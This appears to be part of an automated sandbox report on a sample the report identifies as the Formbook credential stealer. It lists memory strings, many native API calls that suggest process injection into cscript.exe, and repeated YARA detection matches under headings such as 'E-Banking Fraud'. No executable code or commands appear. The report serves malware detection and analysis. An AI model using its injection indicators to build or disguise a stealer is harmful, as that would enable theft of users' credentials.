          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cscript.exe, 00000012.00000002.496418412.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: https://www.123-reg-new-domain.co.uk/iframe.html
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: WXs8v9QuE7.exe, 00000000.00000002.233934690.000000000075A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004181CE NtCreateFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9560 NtWriteFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ADA770 NtOpenThread,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_004181CE NtCreateFile,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041827A NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_005781D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00578280 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00578300 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_005783B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_005781CE NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057827A NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_005783AB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004047D3
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004061D4
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041C0A9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041C1CD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B992
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041A302
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041C383
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00408C70
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B4B3
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041BD9E
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B620A8
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB090
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51002
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9F900
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B622AE
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACEBB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B62B28
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA841F
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2581
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAD5E0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A90D20
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B62D07
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B61D55
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B62EF7
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB6E30
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B61FF1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041C0A9
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041C1CD
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041B992
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041A302
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493D466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049425DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04942D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04870D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04941D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04942EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493D616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04896E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494DFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04941FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049420A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049428EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04931002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0494E824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04894120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049422AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0492FA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AEBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493DBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_049303DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04942B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057A302
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00568C70
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00568C6B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00562D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00562D87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_00562FB0
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: String function: 00A9B150 appears 35 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0487B150 appears 45 times
          Source: WXs8v9QuE7.exe, 00000000.00000003.228374222.0000000009AAF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs WXs8v9QuE7.exe
          Source: WXs8v9QuE7.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
